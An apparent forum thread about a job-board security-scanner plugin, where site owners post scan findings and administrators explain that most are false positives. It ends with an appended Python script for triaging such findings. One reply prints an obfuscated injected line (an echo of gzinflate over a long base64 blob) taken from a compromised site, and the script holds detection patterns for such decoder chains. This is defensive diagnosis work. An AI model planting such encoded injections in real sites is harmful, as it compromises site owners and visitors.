Jamit Software Forum
Author Topic: Security Tools Plugin  (Read 28370 times)
denbec
Jammers
Jr. Member
*
Posts: 15


« Reply #30 on: January 05, 2011, 04:06:05 am »

Happy New Year all!

After a lot of work on my part, my site at http://www.nightowlstaffing.com was ranking very high on Google searches until around Dec. 30th 2010. Suddenly it's not listed anywhere when searching for "2nd shift jobs" or "3rd shift jobs" (those used to be high ranking on the first page). I suspected maybe the site was hacked but now I'm not sure. I installed the latest version of Security Tools v2.1 (thanks for the program Adam!) and I got the results below. Most of them are from my associated WordPress blog at http://www.nightowlstaffing.com/jobblog. If Peter, Adam or anyone has time to review these and let me know if they are real threats and what I should do next I would really appreciate it!

Thanks in advance!

Dennis

Possibly bad code (execution of a shell command) /home/nightowl/public_html/testweb/locate_convert.php on line 5:
$retval = system ("locate convert");
Possibly bad code in (command execution) /home/nightowl/public_html/testweb/locate_convert.php on line 5:
$retval = system ("locate convert");
Possibly bad code (execution of a shell command) /home/nightowl/public_html/admin/suggest_permissions.php on line 118:
exec ('ls -o '.$temp, $output);
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-content/plugins/pretty-link/classes/models/PrliUpdate.php on line 228:
return base64_decode($client->getResponse());
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/theme.php on line 68:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/class-pclzip.php on line 3222:
// extracted in the filesystem (extract).
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 514:
* Assumes that WP_Filesystem() has already been called and set up. Does not extract a root-level __MACOSX directory, if present.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 570:
* Assumes that WP_Filesystem() has already been called and set up.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 652:
* Assumes that WP_Filesystem() has already been called and set up.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 724:
* Assumes that WP_Filesystem() has already been called and setup.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 774:
function WP_Filesystem( $args = false, $context = false ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/plugin.php on line 625:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/class-wp-upgrader.php on line 70:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/update-core.php on line 317:
if ( ! WP_Filesystem($credentials, ABSPATH) ) {
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-app.php on line 1457:
explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION'], 6)));
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-app.php on line 1462:
explode(':', base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'], 6)));
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/class-phpmailer.php on line 438:
if(!@$mail = popen($sendmail, 'w')) {
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 263:
define('SIMPLEPIE_PCRE_HTML_ATTRIBUTE', '((?:[\x09\x0A\x0B\x0C\x0D\x20]+[^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?)*)[\x09\x0A\x0B\x0C\x0D\x20]*');
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 9183:
if (isset($matches[$i][2][0]) && preg_match_all('/[\x09\x0A\x0B\x0C\x0D\x20]+([^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*)(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"([^"]*)"|\'([^\']*)\'|([^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?/', ' ' . $matches[$i][2][0] . ' ', $attribs, PREG_SET_ORDER))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 10775:
$curl = substr($curl, 5, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", 5));
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 10779:
$curl = substr($curl, 8, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", 8));
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11048:
$space_characters = "\x20\x09\x0A\x0B\x0C\x0D";
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11255:
elseif (substr($data, 0, 20) === "\x00\x00\x00\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11257:
if ($pos = strpos($data, "\x00\x00\x00\x3F\x00\x00\x00\x3E"))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11268:
elseif (substr($data, 0, 20) === "\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C\x00\x00\x00")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11270:
if ($pos = strpos($data, "\x3F\x00\x00\x00\x3E\x00\x00\x00"))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11281:
elseif (substr($data, 0, 10) === "\x00\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11294:
elseif (substr($data, 0, 10) === "\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C\x00")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11307:
elseif (substr($data, 0, 5) === "\x3C\x3F\x78\x6D\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13583:
$ws = strspn($this->file->body, "\x09\x0A\x0B\x0C\x0D\x20");
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13603:
elseif (substr($this->file->body, 0, 8) === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13634:
elseif (substr($this->file->body, 0, 8) === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14820:
if (preg_match('/(&(#(x[0-9a-fA-F]+|[0-9]+)|[a-zA-Z0-9]+)|<\/[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>)/', $data))
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14832:
$data = base64_decode($data);
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14875:
$data = preg_replace('/(<[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*)' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . trim($attrib) . '(?:\s*=\s*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>/', '\1\2\3>', $data);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/class-snoopy.php on line 1015:
exec($this->curl_path." -k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/Text/Diff/Engine/shell.php on line 50:
$diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-includes/class-IXR.php on line 249:
$value = base64_decode( trim( $this->_currentTagContents ) );
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php on line 31:
$data = shell_exec($cmd);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php on line 75:
$data = shell_exec($cmd);
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #31 on: January 06, 2011, 11:33:58 am »

.... they are quite annoying especially the one that lists the cache files as it seems to get longer each time....

Annoying? They are only cache files that Traffic Cop creates in order to speed up operation. There is nothing that I can do other than telling Adam, and he might make the Security Tools plugin ignore these cache files.

I am sure that the list of "possible threats" will never be empty, with new plugins being introduced and old plugins being revised constantly. You will still need to rely on your own judgment to some extent.
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
lithium
Jammers
Jr. Member
*
Posts: 13



WWW
« Reply #32 on: January 06, 2011, 11:57:00 am »

OK, thanks for the reply. Excellent plugin by the way, when you look at the deny log it makes you realise how many threats are out there, keep up the good work!
Logged
denbec
Jammers
Jr. Member
*
Posts: 15


« Reply #33 on: January 09, 2011, 08:45:26 pm »

Has anyone had a chance to check my errors above?

Thanks in advance!

Dennis
Logged
Adam
Administrator
Hero Member
*****
Posts: 112


« Reply #34 on: January 12, 2011, 12:09:10 pm »

Hi Dennis,
Thanks for posting! The results seem OK, it looks like a lot of false-positives in WordPress... I may need to adjust the plugin for these.
You can also check Google Webmaster Tools, they also provide a report if any malware has been detected on your site.
Adam
Logged
denbec
Jammers
Jr. Member
*
Posts: 15


« Reply #35 on: January 14, 2011, 04:42:30 am »

Adam - thanks for your response!

Just an FYI - my Google rankings are suddenly back where they were before with no intervention on my part. Must have been a Google Thing. Nice.

Logged
rutulo
Jammers
Sr. Member
*
Posts: 40


« Reply #36 on: September 02, 2011, 03:31:41 pm »

Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null


Can you help me???
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #37 on: September 09, 2011, 09:38:58 pm »

Rutulo,

No problem! That's just the JavaScript code and there is nothing wrong with it!
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
rutulo
Jammers
Sr. Member
*
Posts: 40


« Reply #38 on: September 10, 2011, 01:19:53 pm »

Thanks Peter!
Logged
Sparrotic
Jammers
Newbie
*
Posts: 1


« Reply #39 on: December 12, 2011, 02:08:20 am »

I just installed Jamit and a whole bunch of plugins, just got this security report,

Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Found 3 threats. Some may be false-positives. Please discuss this on the forum
---------------------------------
Possibly a rogue php file: /home/youhire1/public_html/cache/e4fe98bfc2jarfile.txt
Found 1 rogue files. Some may be false-positives

Any feedback, also wondering if I could get a general checkup on my site, I'm inexperienced, just followed a bunch of tutorials, after paying someone thousands of dollars to do it for me a few years ago, only to end up with an unlicensed version, so I bought a license and did it myself.

www.youhireme.com
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #40 on: December 12, 2011, 02:58:22 am »

Hi, if you look about 2 messages up, you will see my earlier comment that those scw_js... files are OK.
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
maddisona
Jammers
Newbie
*
Posts: 6


WWW
« Reply #41 on: July 10, 2012, 10:50:16 am »

Hi, just ran the Scan PHP Files via the Security Tools. Informed to post to this forum (13 threats). Can anyone offer any input/advice? Thanks in advance.

Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/lang/english_default.php on line 1434:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/index.php on line 7:
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/login.php on line 22:
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/main.php on line 157:
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/index.php on line 15:
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/login.php on line 10:
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/index.php on line 81:
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/config-default.php on line 320:
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/main.php on line 157:
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/index.php on line 11:
Found 13 threats. Please discuss this on the forum
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #42 on: July 11, 2012, 01:00:00 am »

It looks like your site was compromised by hackers.

Most likely, the file permissions allowed the hackers to write (inject code) to your site. Now your site has malware.

Best if you delete the whole site and install a new Job Board from scratch. BUT make sure that the permissions are set properly this time!
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
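Added example, not part of any post in this thread and not code from the Security Tools plugin: a small triage pass over scanner findings that separates the noisy hits discussed above (a JavaScript `.exec()` call, hex escapes for whitespace, `base64_decode()` on runtime data) from the pattern reported in Reply #41 (an output sink wrapping a decoder chain over a long embedded literal, repeated in several files). The finding lines, the placeholder payload, the rule names and the thresholds are all constructed assumptions.

```python
import base64
import re
from collections import Counter

# Constructed stand-in for an injected literal (harmless text), not the blob from the thread.
_BLOB = base64.b64encode(b"constructed placeholder, not a real payload. " * 4).decode()
_INJECTED = f'echo(gzinflate(base64_decode("{_BLOB}")));'

# Constructed findings modelled on the report lines quoted in the thread: (path, line, code).
FINDINGS = [
    ("include/lib/scw/scw_js_with_comments.php", 976,
     "if (scwExpValYear.exec(scwArrSeed[0]) == null ||"),
    ("blog/wp-includes/class-IXR.php", 249,
     "$value = base64_decode( trim( $this->_currentTagContents ) );"),
    ("blog/wp-includes/class-simplepie.php", 11048,
     r'$space_characters = "\x20\x09\x0A\x0B\x0C\x0D";'),
    ("admin/suggest_permissions.php", 118, "exec ('ls -o '.$temp, $output);"),
    ("index.php", 81, _INJECTED),
    ("main.php", 157, _INJECTED),
    ("admin/index.php", 11, _INJECTED),
]

# Output/eval sink wrapping one or more decoders around a long embedded base64 literal.
DECODE_CHAIN = re.compile(
    r"""\b(?:eval|echo|print|assert)\s*\(?\s*
        (?:(?:gzinflate|gzuncompress|gzdecode|str_rot13|base64_decode)\s*\(\s*)+
        ["'][A-Za-z0-9+/=]{100,}["']
    """, re.I | re.X)
# identifier.exec( with no "$" or "->" in front: a JavaScript RegExp method call, not PHP exec().
JS_EXEC = re.compile(r"(?<![$\w>])[A-Za-z_]\w*\s*\.\s*exec\s*\(")
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
# base64_decode() whose argument is an expression rather than a quoted literal.
B64_RUNTIME = re.compile(r"base64_decode\s*\((?!\s*[\"'])", re.I)


def classify(code):
    """Return (verdict, reason) for one flagged source line."""
    if DECODE_CHAIN.search(code):
        return "high", "sink wraps a decoder chain over a long embedded literal"
    if JS_EXEC.search(code):
        return "low", "object.exec() is a JavaScript method call"
    escapes = [int(h, 16) for h in HEX_ESCAPE.findall(code)]
    if escapes and all(0x09 <= b <= 0x0D or 0x20 <= b <= 0x7E for b in escapes):
        return "low", "hex escapes only spell whitespace or printable ASCII"
    if B64_RUNTIME.search(code):
        return "low", "decodes runtime data, not an embedded payload"
    return "review", "no rule matched; read the file"


def triage(findings):
    """Classify every finding and list files that share an identical high-signal line."""
    rows = [(path, line, code.strip(), *classify(code)) for path, line, code in findings]
    spread = Counter(code for _, _, code, verdict, _ in rows if verdict == "high")
    mass = sorted(path for path, _, code, _, _ in rows if spread[code] >= 2)
    return rows, mass


if __name__ == "__main__":
    rows, mass = triage(FINDINGS)
    for path, line, _, verdict, reason in rows:
        print(f"{verdict:6} {path}:{line}  {reason}")
    print("identical injected line in:", ", ".join(mass))
```

A "low" verdict only says the line matches a known benign shape; a shell command built from a variable, like the `exec ('ls -o '.$temp, ...)` line, stays in "review" for a person to read.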